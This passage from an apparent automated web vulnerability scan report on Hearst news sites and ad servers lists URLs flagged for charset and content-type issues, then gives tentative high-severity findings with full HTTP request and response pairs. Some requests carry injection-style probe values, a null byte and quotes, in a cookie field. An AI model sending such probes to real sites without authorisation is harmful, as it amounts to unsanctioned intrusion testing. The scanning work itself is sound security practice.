24.5. http://a.rfihub.com/nai_check_status.gif
24.6. http://a.tribalfusion.com/j.ad
24.7. http://ad.amgdgt.com/ads/
24.8. http://ad.auditude.com/adserver
24.9. http://ad.doubleclick.net/adj/q1.q.seattlepostintelligencer/qo
24.10. http://ad.turn.com/server/ads.js
24.11. http://ad.yieldmanager.com/imp
24.12. http://adreq.bizographics.com/i
24.13. http://ads.amgdgt.com/ads/opt-out
24.14. http://ads.undertone.com/fc.php
24.15. http://adserver.teracent.net/tase/ad
24.16. http://adsfac.us/ag.asp
24.17. http://advertising.aol.com/nai/nai.php
24.18. http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js
24.19. http://amch.questionmarket.com/dt/s/28067/0.php
24.20. http://api.twitter.com/1/statuses/user_timeline.json
24.21. http://api.zap2it.com/tvlistings/zcConnector.jsp
24.22. http://as.serving-sys.com/OptOut/nai_optout_results.aspx
24.23. http://as1.suitesmart.com/102386/G14531.js
24.24. http://b.rad.msn.com/ADSAdClient31.dll
24.25. http://b.scorecardresearch.com/r
24.26. http://bs.serving-sys.com/BurstingPipe/adServer.bs
24.27. http://c.brightcove.com/services/viewer/federated_f9
24.28. http://cdn.turn.com/server/ddc.htm
24.29. http://cdn1.manilla.com/wp-content/themes/manilla-1.2/css/jquery.fancybox.1.3.4.css
24.30. http://ce.lijit.com/merge
24.31. http://cim.meebo.com/cim
24.32. http://cm.g.doubleclick.net/pixel
24.33. http://cm.npc-hearst.overture.com/js_1_0/
24.34. http://dc.kaboodle.com/b/ss/kaboodlecom/1/H.2-pdv-2/s98178625190630
24.35. http://dis.criteo.com/dis/optoutstatus.aspx
24.36. http://domdex.com/nai_optout_status.php
24.37. http://ds.serving-sys.com/BurstingCachedScripts//SBTemplates_2_4_2/StdBanner.js
24.38. http://ellegirl.elle.com/
24.39. http://events.adchemy.com/visitor/auuid/nai-status
24.40. http://events.seattlepi.com/partner_json/search
24.41. http://events.stamfordadvocate.com/partner_json/search
24.42. http://fetchback.com/serve/fb/optout
24.43. http://fls.doubleclick.net/activityi
24.44. http://g-pixel.invitemedia.com/gmatcher
24.45. http://googleads.g.doubleclick.net/pagead/ads
24.48. http://hearstmagazines.112.2o7.net/b/ss/hmagglobal/1/H.22.1--NS/0
24.49. http://hfm.checkm8.com/adam/detect
24.50. http://img.pulsemgr.com/optout
24.51. http://internetmarketing.localedge.com/
24.52. http://load.exelator.com/load/OptOut.php
24.53. http://loadus.exelator.com/load/
24.54. http://login.dotomi.com/ucm/UCMController
24.55. http://metrics.elle.com/b/ss/hcfellegirlprod/1/H.15.1/s92564277239143
24.56. http://metrics.seattlepi.com/b/ss/hearstseattlepi/1/H.21/s91569553883746
24.57. http://nai.ad.us-ec.adtechus.com/nai/daa.php
24.58. http://nai.adserver.adtechus.com/nai/daa.php
24.59. http://nai.adserverec.adtechus.com/nai/daa.php
24.60. http://nai.adserverwc.adtechus.com/nai/daa.php
24.61. http://nai.adsonar.com/nai/daa.php
24.62. http://nai.adtech.de/nai/daa.php
24.63. http://nai.advertising.com/nai/daa.php
24.64. http://nai.btrll.com/nai/status
24.65. http://nai.glb.adtechus.com/nai/daa.php
24.66. http://nai.tacoda.at.atwola.com/nai/daa.php
24.67. http://o.sa.aol.com/b/ss/aolamn,aolsvc/1/H.21/s96658798141233
24.68. http://omnituretrack.local.com/b/ss/ic-hulk2010production/1/H.17/s91523811360821
24.69. http://optout.33across.com/api/
24.70. http://optout.cognitivematch.com/optoutStatus
24.71. http://optout.crwdcntrl.net/optout/check.php
24.72. http://optout.invitemedia.com:9030/check_optout
24.73. http://optout.media6degrees.com/orbserv/NAIStatus
24.74. http://optout.mxptint.net/naistatus.ashx
24.75. http://origin.chron.com/apps/audit/ads.gif
24.76. http://p.opt.fimserve.com/nai_check.jsp
24.77. http://pbid.pro-market.net/engine
24.78. http://pixel.fetchback.com/serve/fb/optout
24.79. http://pixel.quantserve.com/api/segments.json
24.80. http://ps2.newsinc.com/players/GetZoneID/90009.xml
24.81. http://r.skimresources.com/api/
24.82. http://r.turn.com/r/optout
24.83. http://rad.msn.com/ADSAdClient31.dll
24.84. http://rt.legolas-media.com/lgrt
24.85. http://s.xp1.ru4.com/coop
24.86. http://s.ytimg.com/yt/swfbin/cps-vflP_j6Bm.swf
24.87. http://s0.2mdn.net/666472/Amex_Midas_NoBlackout_728x90.swf
24.89. http://safebrowsing.clients.google.com/safebrowsing/gethash
24.90. http://sana.newsinc.com/sana.html
24.91. http://sensor2.suitesmart.com/sensor4.js
24.92. http://services.hearstmags.com/registration/get_hearst_user.js
24.93. http://spe.atdmt.com/ds/UXUJ3UMJ3NYS/WaveForChange_BTS2011/JJ_NW_300x250_Spin.swf
24.94. http://syn.verticalacuity.com/varw/getPromo
24.95. http://t.invitemedia.com/track_imp
24.96. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686642
24.97. http://tcr.tynt.com/javascripts/Tracer.js
24.98. http://test.ctpost.com/beacon/error
24.99. http://tm.verticalacuity.com/vat/visitT
24.100. http://toolbarqueries.clients.google.com/tbproxy/af/query
24.101. http://um.simpli.fi/an
24.102. http://us.bc.yahoo.com/b
24.103. http://vms.msn.com/vms.aspx
24.104. http://www.adbrite.com/mb/nai_optout_check.php
24.105. http://www.addthis.com/api/nai/status
24.106. http://www.bizographics.com/nai/status
24.107. http://www.burstnet.com/cgi-bin/opt_out_check.cgi
24.108. http://www.casalemedia.com/cgi-bin/naiOptout.cgi
24.109. http://www.chron.com/apps/adWiz/adWiz.mpl
24.110. http://www.delish.com/
24.111. http://www.facebook.com/plugins/like.php
24.112. http://www.fetchback.com/resources/naicheck.php
24.113. http://www.gather.com/
24.114. http://www.google-analytics.com/__utm.gif
24.115. http://www.google.com/cse/brand
24.116. http://www.kaboodle.com/
24.118. http://www.localedge.com/wdpsearch/localedgebusinesssearch.htm
24.119. http://www.manilla.com/
24.120. http://www.mathtag.com/cgi-bin/optout
24.121. http://www.mediaplex.com/status_pure.php
24.122. http://www.meebo.com/cim/sandbox.php
24.123. http://www.misquincemag.com/
24.124. http://www.pulse360.com/behavior/nai-opt-out.html
24.125. http://www.quickandsimple.com/
24.126. http://www.realage.com/default.aspx
24.127. http://www.realmedia.com/cgi-bin/nph-verify_oo.cgi
24.128. http://www.seattlepi.com/
24.129. http://www.seventeen.com/
24.130. http://www.stamfordadvocate.com/
24.131. http://www.thedailygreen.com/
24.132. http://www.timesunion.com/
24.133. http://www.tribalfusion.com/optout/verify.js
24.134. http://www.ugo.com/cm/ugo/css/ugo-global.css
24.135. http://www.youtube-nocookie.com/v/IOje-N90P38&hl=en_US&fs=1&
24.136. http://www.zvents.com/misc/widgets/20645.js
24.137. http://www2.glam.com/app/site/affiliate/nc/gs-optout.act
24.138. http://y.timesunion.com/b/ss/hearstalbanytu/1/H.21/s97295546184759
25. HTML does not specify charset
25.1. http://a.collective-media.net/
25.2. http://a.collective-media.net/favicon.ico
25.3. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.3
25.4. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.5
25.5. http://ad.doubleclick.net/adi/N1558.NetMining/B4742075.6
25.6. http://ad.doubleclick.net/adi/N5019.284127.DBGVIDEONETWORK/B5621714
25.7. http://ad.doubleclick.net/adi/N6257.274732.SEATTLEPI-NNN/B5824230.2
25.8. http://ad.doubleclick.net/adi/N6257.274732.SEATTLEPI-NNN/B5824230.3
25.9. http://ad.doubleclick.net/adi/N763.SpecificMedia.com/B5645537.30
25.10. http://ad.doubleclick.net/adi/N763.SpecificMedia.com/B5645537.31
25.11. http://ad.doubleclick.net/pfadx/seventeen_cim/
25.12. http://adreq.bizographics.com/i
25.13. http://adsfac.us/ag.asp
25.14. http://advertising.aol.com/nai/nai.php
25.15. http://amch.questionmarket.com/adscgen/d_layer.php
25.16. http://amch.questionmarket.com/adscgen/dynamiclink.js.php
25.17. http://amch.questionmarket.com/adscgen/st.php
25.18. http://an.tacoda.net/an/slf.htm
25.19. http://api.uproxx.com/ulink/feed
25.20. http://bs.serving-sys.com/BurstingPipe/adServer.bs
25.21. http://content.pulse360.com/535BB4CE-7CD8-11E0-8B1F-79D9E4064C68
25.22. http://contextweb.pixel.invitemedia.com/context_sync
25.23. http://corporate.local.com/mk/get/advertising-opportunities
25.24. http://corporate.local.com/mk/get/contact-us
25.25. http://d3.zedo.com/jsc/d3/ff2.html
25.26. http://fls.doubleclick.net/activityi
25.28. http://hearst.com/about-hearst/corporate-george-r-hearst-jr.php
25.29. http://hearst.com/about-hearst/corporate-mark-e-aldam.php
25.30. http://hearst.com/about-hearst/index.php
25.31. http://hearst.com/newspapers/albany-times-union.php
25.32. http://hearst.com/newspapers/hearst-news-service.php
25.33. http://hearst.com/newspapers/index.php
25.34. http://hearst.com/newspapers/localedge.php
25.35. http://hearst.com/newspapers/metrix4media.php
25.36. http://hearst.com/newspapers/seattlepicom.php
25.37. http://hearst.com/newspapers/the-advocate.php
25.38. http://hearst.com/press-room/index.php
25.39. http://hearst.com/press-room/pr-20110817a.php
25.40. http://hfm.checkm8.com/adam/detect
25.41. http://loadus.exelator.com/load/net.php
25.43. http://metrix4media.com/
25.44. http://networkadvertising.org/consumer/opt_out.asp
25.45. http://pbid.pro-market.net/engine
25.46. http://sana.newsinc.com/sana.html
25.47. http://sensor2.suitesmart.com/sensor4.js
25.48. http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/donatemydress_us
25.49. http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/misquincemag_us
25.50. http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/quickandsimple_us_btf
25.51. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626
25.52. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686642
25.53. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61721100
25.54. http://tag.admeld.com/ad/iframe/610/hearst/728x90/ht_1064834_61686626
25.55. http://tag.admeld.com/ad/iframe/610/hearst/728x90/ht_1064834_61686642
25.56. http://tag.admeld.com/ad/iframe/610/hearst/728x90/ht_1064834_61721100
25.57. http://tags.bluekai.com/site/2187
25.58. http://tracker.u-link.me/ut_.js
25.59. http://video.od.visiblemeasures.com/log
25.60. http://widget.newsinc.com/ndn_toppicks.html
25.61. http://www.delish.com/api_static/twitter.json
25.62. http://www.donatemydress.org/
25.63. http://www.metrix4media.com/
25.64. http://www.metrix4media.com/solutions.html
25.65. http://www.misquincemag.com/misquincepp-quinceanera-2009-mis-quince-insert
25.66. http://www.networkadvertising.org/managing/opt_out.asp
25.67. http://www.networkadvertising.org/managing/optout_results.asp
25.68. http://www.quickandsimple.com/pp-qas-2011-9-7
25.69. http://www.realage.com/glossary.json
25.70. http://www.realage.com/promo-player-homepage-2011-03-25
25.71. http://www.seventeen.com/api_static/twitter.json
25.72. http://www.thedailygreen.com/api_static/twitter.json
25.73. http://www.thedailygreen.com/homezipfeed/
25.74. http://www.thedailygreen.com/promo-homepage-110916
25.75. http://www.tribalfusion.com/test/opt.js
25.76. http://www.ugo.com/takeover/takeover.html
25.77. http://www.ugo.com/xd_receiver.htm
26. Content type incorrectly stated
26.1. http://a.rad.msn.com/ADSAdClient31.dll
26.2. http://a1.interclick.com/getInPageJS.aspx
26.3. http://a1.interclick.com/getInPageJSProcess.aspx
26.4. http://ad.doubleclick.net/pfadx/seventeen_cim/
26.5. http://adserver.teracent.net/tase/ad
26.6. http://amch.questionmarket.com/adscgen/d_layer.php
26.7. http://amch.questionmarket.com/adscgen/dynamiclink.js.php
26.8. http://amch.questionmarket.com/adscgen/st.php
26.9. http://api.uproxx.com/ulink/feed
26.10. http://api.uproxx.com/ulink/template.js
26.11. http://api.zap2it.com/tvlistings/zcConnector.jsp
26.12. http://b.rad.msn.com/ADSAdClient31.dll
26.13. http://bs.serving-sys.com/BurstingPipe/adServer.bs
26.14. http://content.pulse360.com/535BB4CE-7CD8-11E0-8B1F-79D9E4064C68
26.15. http://ellegirl.elle.com/wp-content/themes/thesis/custom/images/hearst-logo.png
26.16. http://event.adxpose.com/event.flow
26.17. http://events.seattlepi.com/partner_json/search
26.18. http://events.stamfordadvocate.com/partner_json/search
26.19. http://flesler-plugins.googlecode.com/files/jquery.localscroll-1.2.7-min.js
26.20. http://goku.brightcove.com/1pix.gif
26.21. http://hearst.com/flash/slideshow-home.xml
26.22. http://hearst.com/flash/slideshow-newspapers.xml
26.23. http://hfm.checkm8.com/adam/detect
26.24. http://html5form.googlecode.com/svn/trunk/jquery.html5form-min.js
26.25. http://o.aolcdn.com/os_merge/
26.26. http://ps2.newsinc.com/Playlist/show/90009/1709/507.xml
26.27. http://ps2.newsinc.com/players/GetZoneID/90009.xml
26.28. http://r.skimresources.com/api/
26.29. http://rad.msn.com/ADSAdClient31.dll
26.30. http://seattlepi.ux.hearstdigitalnews.com/favicon.ico
26.31. http://sensor2.suitesmart.com/sensor4.js
26.32. http://stamfordadvocate.ux.hearstdigitalnews.com/favicon.ico
26.33. http://thumbnail.newsinc.com/23529630.sf.jpg
26.34. http://tracker.u-link.me/ut_.js
26.35. http://ua.uproxxcdn.com/CXBetoHkoRG7G0E.png
26.36. http://ua.uproxxcdn.com/DZ2iEV7OFqoJUqT.png
26.37. http://ua.uproxxcdn.com/FKOcJyHi3WPtNW3.png
26.38. http://ua.uproxxcdn.com/RagyhhqntMN7eO5.png
26.39. http://ua.uproxxcdn.com/WiYUAs3s08PJENf.png
26.40. http://ua.uproxxcdn.com/r63wMetmtJgpwY8.jpg
26.41. http://video.od.visiblemeasures.com/log
26.42. http://vms.msn.com/vms.aspx
26.43. http://www.delish.com/api_static/twitter.json
26.44. http://www.delish.com/delish-network-tout.json
26.45. http://www.delish.com/promo-player-homepage-2011-9-15
26.46. http://www.facebook.com/extern/login_status.php
26.47. http://www.kampyle.com/favicon.ico
26.48. http://www.local.com/skins/default/images/locm_transhadow_v001.jpg
26.49. http://www.meebo.com/mcmd/events
26.50. http://www.meebo.com/mcmd/subscribe
26.51. http://www.misquincemag.com/misquincepp-quinceanera-2009-mis-quince-insert
26.52. http://www.quickandsimple.com/pp-qas-2011-9-7
26.53. http://www.realage.com/glossary.json
26.54. http://www.realage.com/promo-player-homepage-2011-03-25
26.55. http://www.seattlepi.com/mediaManager/
26.56. http://www.seventeen.com/api_static/twitter.json
26.57. http://www.stamfordadvocatedailydeals.com/favicon.ico
26.58. http://www.stamfordadvocatedailydeals.com/widgets/a
26.59. http://www.thedailygreen.com/api_static/twitter.json
26.60. http://www.thedailygreen.com/promo-homepage-110916
26.61. http://www.tribalfusion.com/test/opt.js
27. Content type is not specified
27.1. http://208.111.153.35/open/1
27.2. http://ad.technoratimedia.com/st
27.3. http://pcm1.map.pulsemgr.com/uds/pc
27.4. http://www.meebo.com/cmd/btproviders
27.5. http://www.meebo.com/cmd/tc
27.6. http://www.meebo.com/mcmd/start
Severity: | High |
Confidence: | Tentative |
Host: | http://ad.doubleclick.net |
Path: | /adj/DY146/ron_lifestyle |
GET /adj/DY146/ron_lifestyle Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.misquincemag User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=OPT_OUT |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 3564 Set-Cookie: id=c2102423c000027||t P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Set-Cookie: test_cookie=CheckFor Date: Sat, 17 Sep 2011 16:38:31 GMT Expires: Sat, 17 Sep 2011 16:38:31 GMT Cache-Control: private document.write('<IFRAME SRC=\"http://ad ...[SNIP]... 033469%3B4307-300/250 ...[SNIP]... |
GET /adj/DY146/ron_lifestyle Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.misquincemag User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=OPT_OUT |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 1712 Set-Cookie: id=cd801423c0000f8||t P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Set-Cookie: test_cookie=CheckFor Date: Sat, 17 Sep 2011 16:38:33 GMT Expires: Sat, 17 Sep 2011 16:38:33 GMT Cache-Control: private document.write('<IFRAME SRC=\"http://ad ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://ad.doubleclick.net |
Path: | /adj/hdm.quicksimple |
GET /adj/hdm.quicksimple Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.quickandsimple User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=OPT_OUT%00' |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 7122 Set-Cookie: id=c6bf8413c00006d||t P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Set-Cookie: test_cookie=CheckFor Date: Sat, 17 Sep 2011 16:35:22 GMT Expires: Sat, 17 Sep 2011 16:35:22 GMT Cache-Control: private document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Sep 01 13:12:40 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y else if (window.ActiveXObject && window.execScript){ window.execScript('on error resume next\npVM=2\ndo\npVM=pVM ...[SNIP]... |
GET /adj/hdm.quicksimple Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.quickandsimple User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=OPT_OUT%00'' |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 278 Set-Cookie: id=c7bf8413c0000a6||t P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Set-Cookie: test_cookie=CheckFor Date: Sat, 17 Sep 2011 16:35:23 GMT Expires: Sat, 17 Sep 2011 16:35:23 GMT Cache-Control: private document.write(''); admeld_publisher = 303; admeld_site = 'hearst_us'; admeld_size = '728x90'; admeld_placement = 'quickandsimple_us'; document.write('\n<script type=\"text/javascript ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://api.uproxx.com |
Path: | /ulink/feed |
GET /ulink/feed?pid=163&limit Host: api.uproxx.com Proxy-Connection: keep-alive Referer: http://www.ugo.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=e21911b30c |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:34:49 GMT Server: Apache Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 4563 UPROXXJSON( [{"category":"Web Culture","content_title": ...[SNIP]... e_favicon":"http:\/\/www ...[SNIP]... |
GET /ulink/feed?pid=163&limit Host: api.uproxx.com Proxy-Connection: keep-alive Referer: http://www.ugo.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=e21911b30c |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:34:49 GMT Server: Apache Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 4548 UPROXXJSON( [{"category":"Web Culture","content_title": ...[SNIP]... e_favicon":"http:\/\/www ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://hfm.checkm8.com |
Path: | /adam/detect |
GET /adam/detect?cat=hfmus.eg Host: hfm.checkm8.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: dt=97,20110917162454,OS |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:50:38 GMT Server: Apache P3P: policyref="http://hfm x-internal-server: 192.168.212.13 NY-AD3 Set-cookie: A=dqR5Y9wSL3KUv9UJ7MTba Set-cookie: C=okL6Y9wbG5Y1caaJaS x-internal-browser: CH0 Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires x-internal-id: 156333621/1230474426 x-internal-selected: x-internal-error: NO VALID CATEGORY NAME Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript ... |
GET /adam/detect?cat=hfmus.eg Host: hfm.checkm8.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: dt=97,20110917162454,OS |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:50:38 GMT Server: Apache P3P: policyref="http://hfm x-internal-server: 192.168.212.13 NY-AD3 Set-cookie: C=okL6Y9wbG5Y1caaKaS x-internal-browser: CH0 Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires x-internal-id: 156333621/1230474426 x-internal-selected: x-internal-error: NO VALID CATEGORY NAME Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript ... |
Severity: | High |
Confidence: | Tentative |
Host: | http://hfm.checkm8.com |
Path: | /adam/detect |
GET /adam/detect?cat=hfmus.eg Host: hfm.checkm8.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: dt=97,20110917162454,OS |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:50:45 GMT Server: Apache P3P: policyref="http://hfm x-internal-server: 192.168.212.12 NY-AD2 Set-cookie: A=dqR5Y9wCJ38Sv9UJ7MTba Set-cookie: C=orL6Y9wx3NQ0caabbS x-internal-browser: CH0 Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires x-internal-id: 153976775/1228210170 x-internal-selected: x-internal-error: NO VALID CATEGORY NAME Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript ... |
GET /adam/detect?cat=hfmus.eg Host: hfm.checkm8.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: dt=97,20110917162454,OS |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:50:45 GMT Server: Apache P3P: policyref="http://hfm x-internal-server: 192.168.212.12 NY-AD2 Set-cookie: C=orL6Y9wx3NQ0caacbS x-internal-browser: CH0 Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires x-internal-id: 153976775/1228210170 x-internal-selected: x-internal-error: NO VALID CATEGORY NAME Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript ... |
Severity: | High |
Confidence: | Tentative |
Host: | http://hfm.checkm8.com |
Path: | /adam/detect |
GET /adam/detect?cat=hfmus.eg Host: hfm.checkm8.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: dt=97,20110917162454,OS |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:50:42 GMT Server: Apache P3P: policyref="http://hfm x-internal-server: 192.168.212.12 NY-AD2 Set-cookie: A=dqR5Y9wCJ38Sv9UJ7MTba Set-cookie: C=onL6Y9wx3NQ0caaYaS x-internal-browser: CH0 Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires x-internal-id: 153976775/1228210170 x-internal-selected: x-internal-error: NO VALID CATEGORY NAME Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript ... |
GET /adam/detect?cat=hfmus.eg Host: hfm.checkm8.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: dt=97,20110917162454,OS |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:50:42 GMT Server: Apache P3P: policyref="http://hfm x-internal-server: 192.168.212.12 NY-AD2 Set-cookie: C=onL6Y9wx3NQ0caaZaS x-internal-browser: CH0 Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires x-internal-id: 153976775/1228210170 x-internal-selected: x-internal-error: NO VALID CATEGORY NAME Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript ... |
Severity: | High |
Confidence: | Tentative |
Host: | http://hfm.checkm8.com |
Path: | /adam/detect |
GET /adam/detect?cat=hfmus.eg Host: hfm.checkm8.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: dt=97,20110917162454,OS |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:51:06 GMT Server: Apache P3P: policyref="http://hfm x-internal-server: 192.168.212.12 NY-AD2 Set-cookie: A=dqR5Y9wdH68Sv9UJ7MTba Set-cookie: C=oML6Y9wx3NQ0caascS x-internal-browser: CH0 Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires x-internal-id: 153976775/1228215787 x-internal-selected: x-internal-error: NO VALID CATEGORY NAME Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript ... |
